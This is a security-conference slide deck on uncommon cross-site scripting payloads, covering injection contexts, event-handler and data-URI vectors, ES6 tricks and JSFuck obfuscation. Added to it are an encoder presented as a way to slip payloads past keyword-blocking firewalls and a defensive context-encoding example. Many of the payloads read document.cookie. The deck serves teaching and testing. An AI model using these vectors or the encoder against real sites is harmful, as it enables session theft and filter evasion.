Esoteric XSS Payloads Day 2, Track 2, 12:00

ESOTERIC XSS PAYLOADS
c0c0n 2016
@riyazwalikar @wincmdfu

RIYAZ WALIKAR
Chief Offensive Security Officer @Appsecco
Security evangelist, leader for null Bangalore and OWASP chapters
Trainer/Speaker: BlackHat, DEF CON, nullcon, c0c0n, OWASP AppSec USA
Twitter: @riyazwalikar and @wincmdfu
http://ibreak.software

WHAT IS THIS TALK ABOUT?
• Quick contexts
• Uncommon XSS vectors

WHAT ARE INJECTION CONTEXTS?
"Just like the word 'date' could mean a fruit, a point in time or a romantic meeting based on the context in which it appears, the impact of user input appearing in the page would depend on the context in which the browser tries to interpret the user input."
(Lavakumar Kuppan, IronWASP)

3 MOST COMMON INJECTION CONTEXTS
• HTML context
• HTML element context
• Script context

HTML CONTEXT
<html>
<body>
Welcome user_tainted_input!
</body>
</html>

HTML ELEMENT CONTEXT
<html>
<body>
Welcome bob!
<input id="user" name="user" value=user_tainted_input>
</body>
</html>

SCRIPT CONTEXT
<html>
<body>
Welcome bob!
<script>
var a = user_tainted_input;
</script>
</body>
</html>

Common vectors?
<script>alert(document.cookie)</script>
<svg onload=alert(document.cookie)>
<input onfocus=alert(document.cookie) autofocus>

Multiple ways of representation
document.cookie
document['cookie']
document['coo'+'kie']
eval('doc'+'ument')['coo'+'kie']

Autoscrolling the page
<body onscroll=alert(1)>
<br> <br> <br> <br> <br> <br> ...
<br> <br> <br> <br> <br>
<input autofocus>

New HTML Elements
<video><source onerror="alert(1)">
<details open ontoggle="alert(1)">   <!-- Chrome only -->

Using the CDATA section inside SVG
<svg><![CDATA[><image xlink:href="]]>
<img src=xx:x onerror=alert(2)//"></svg>

Using DATA URIs
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>

Using the embed tag
<embed src="javascript:alert(1)"></embed>

Overwriting the ReferenceError object
<script>
ReferenceError.prototype.__defineGetter__('name', function() {alert(1)}),x
</script>

ES6 Computed properties
({[alert(1)]: 1})
({[eval('ale'+'rt')(0)]: 1})

Back ticks FTW!
No enclosing brackets required:
alert`1`

Expansion of \u{61} and backticks
loc\u{61}tion=j\u{61}vascript:alert`1`

Prototyping the .toString() method
Object.prototype[Symbol.toStringTag]='<img src=1 onerror=alert(0)>';
location='javascript:1+{}'

JSFUCK
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code: ()+[]!

false     => ![]
true      => !![]
undefined => [][[]]
NaN       => +[![]]
0         => +[]
1         => +!+[]
2         => !+[]+!+[]
10        => [+!+[]]+[+[]]
Array     => []
Number    => +[]
String    => []+[]
Boolean   => ![]
Function  => []["filter"]
eval      => []["filter"]["constructor"](CODE)()
window    => []["filter"]["constructor"]("return this")()

alert(0)
(![]+[])[1]+(![]+[])[2]+(![]+[])[4]+(!![]+[])[1]+(!![]+[])[0]+"(0)"

The ES6 specification coupled with new HTML5 elements and event handlers can be used to bypass most blacklist based web application firewalls.
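The encoder below is an added example, not code from the talk or from jsfuck.com. It builds strings out of the six characters ()+[]! using the atoms from the JSFuck slide (false, true, undefined, NaN, digits) and then bootstraps the rest of its alphabet from the source text of Array.prototype.filter, which is how the `(` and `)` that the slide abbreviates as the literal "(0)" are really obtained. The function names, the character table and the assumption of a V8 engine (Node or Chrome, where `[].filter + []` is `"function filter() { [native code] }"`) are this example's own. Feeding the output to a keyword blacklist shows the WAF point made above: there is no "alert" left to match.

```javascript
// Added example (not the talk's or jsfuck.com's code): a minimal JSFuck-style
// encoder. Assumption: a V8 engine, where [].filter + [] stringifies to
// "function filter() { [native code] }". Only the characters reachable from
// the atoms below and that function text are supported.

// A number n as an expression that evaluates to a Number (usable as an index).
function num(n) {
  if (n === 0) return '+[]';                 // +[]   -> 0
  if (n === 1) return '+!+[]';               // +!+[] -> 1
  return Array(n).fill('!+[]').join('+');    // true+true+... -> n
}

// Strings obtained by coercing primitives (the slide's atoms, as strings).
const BASE = {
  false: '(![]+[])',        // "false"
  true: '(!![]+[])',        // "true"
  undefined: '([][[]]+[])', // "undefined"
  NaN: '(+[![]]+[])',       // "NaN"
};

// Characters reachable as BASE[source][index].
const CHARS = {
  f: ['false', 0], a: ['false', 1], l: ['false', 2], s: ['false', 3], e: ['false', 4],
  t: ['true', 0], r: ['true', 1], u: ['true', 2],
  n: ['undefined', 1], d: ['undefined', 2], i: ['undefined', 5],
  N: ['NaN', 0],
};

function charExpr(c) {
  if (!(c in CHARS)) throw new Error(`no encoding for ${JSON.stringify(c)}`);
  const [src, idx] = CHARS[c];
  return `${BASE[src]}[${num(idx)}]`;
}

// Digits become (n+[]) -> "n"; everything else is a character lookup.
function strExpr(s) {
  return [...s].map(c => (/[0-9]/.test(c) ? `(${num(+c)}+[])` : charExpr(c))).join('+');
}

// Bootstrap: "filter" needs only f,i,l,t,e,r, so []["filter"] is reachable and
// its source text supplies c, o, v, space, parentheses, brackets and braces.
const FILTER_FN = `[][${strExpr('filter')}]`;
BASE.filter = `(${FILTER_FN}+[])`;   // "function filter() { [native code] }"
Object.assign(CHARS, {
  c: ['filter', 3], o: ['filter', 6], ' ': ['filter', 8],
  '(': ['filter', 15], ')': ['filter', 16], '{': ['filter', 18],
  '[': ['filter', 20], v: ['filter', 25], ']': ['filter', 32], '}': ['filter', 34],
});

// Encode a string value; eval() of the result yields that string.
function jsfuckString(s) {
  return strExpr(s);
}

// Encode code for execution through []["filter"]["constructor"](code)(),
// the Function-constructor trick listed on the slide.
function jsfuckExec(code) {
  return `${FILTER_FN}[${strExpr('constructor')}](${strExpr(code)})()`;
}

// Sanity check: the output really is restricted to the six characters.
function onlySixChars(expr) {
  return /^[()+\[\]!]+$/.test(expr);
}
```

`jsfuckString('alert(0)')` evaluates back to the string "alert(0)" and `jsfuckExec('return true')` evaluates to `true`; neither output contains a single letter, so a filter that matches on `alert(`, `eval` or `document` never fires.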
A lot of active research has been done in this area by @0x6D6172696F and the good folks at cure53.

Q & A
http://ibreak.software
@riyazwalikar @wincmdfu

REFERENCES:
http://blog.ironwasp.org/2014/07/contexts-and-cross-site-scripting-brief.html
https://github.com/riyazwalikar/simplexssapp
https://html5sec.org/
http://www.jsfuck.com/
http://blog.innerht.ml/cascading-style-scripting
https://cure53.de/es6-for-penetration-testers.pdf
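The three injection contexts from the opening slides, as an added example that is not part of the deck: one constructed payload is rendered into the HTML, HTML element and script contexts first the way the slides show it (raw concatenation) and then with context-specific encoding, together with the checks that tell the two apart. The template strings, helper names and sample payload are this example's own assumptions.

```javascript
// Added example, not from the talk: the tainted input from the three context
// slides rendered unsafely and then with per-context encoding.

// Constructed sample: a single payload that lands differently in each context.
const SAMPLE = '</script><svg onload=alert(document.cookie)>';

// Unsafe rendering: the input is concatenated as-is, exactly as on the slides.
function renderUnsafe(input) {
  return {
    html: `<body>Welcome ${input}!</body>`,
    attribute: `<input id="user" name="user" value=${input}>`, // unquoted, as on the slide
    script: `<script>var a = ${input};</script>`,
  };
}

// HTML context: neutralise the characters that can open or close markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// HTML element (attribute) context: quote AND escape. An unquoted value ends at
// the first whitespace, so escaping alone still leaves "onload=..." as a new attribute.
function attributeValue(s) {
  return `"${escapeHtml(s)}"`;
}

// Script context: emit a JS string literal. JSON.stringify handles quotes and
// backslashes, but the HTML parser still ends the element at "</script", so
// "</" is broken up; U+2028/U+2029 are escaped for engines that treat them as
// line terminators inside literals.
function jsStringLiteral(s) {
  return JSON.stringify(String(s))
    .replace(/<\//g, '<\\/')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderSafe(input) {
  return {
    html: `<body>Welcome ${escapeHtml(input)}!</body>`,
    attribute: `<input id="user" name="user" value=${attributeValue(input)}>`,
    script: `<script>var a = ${jsStringLiteral(input)};</script>`,
  };
}

// Checks a reviewer can run over rendered output: did a start tag, or a
// script-element boundary, appear that the template itself did not emit?
function countTags(markup, tagName) {
  return (markup.match(new RegExp(`<${tagName}\\b`, 'gi')) || []).length;
}
function countScriptCloses(markup) {
  return (markup.match(/<\/script/gi) || []).length;
}
```

With the sample above, the unsafe renderings contain an injected `<svg>` in the HTML and attribute contexts and a second `</script>` in the script context; the safe renderings contain none of those, and the script-context literal still evaluates back to the original value, which is the property a context-aware encoder has to preserve.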

Source document: PDF, 27 pages, English.
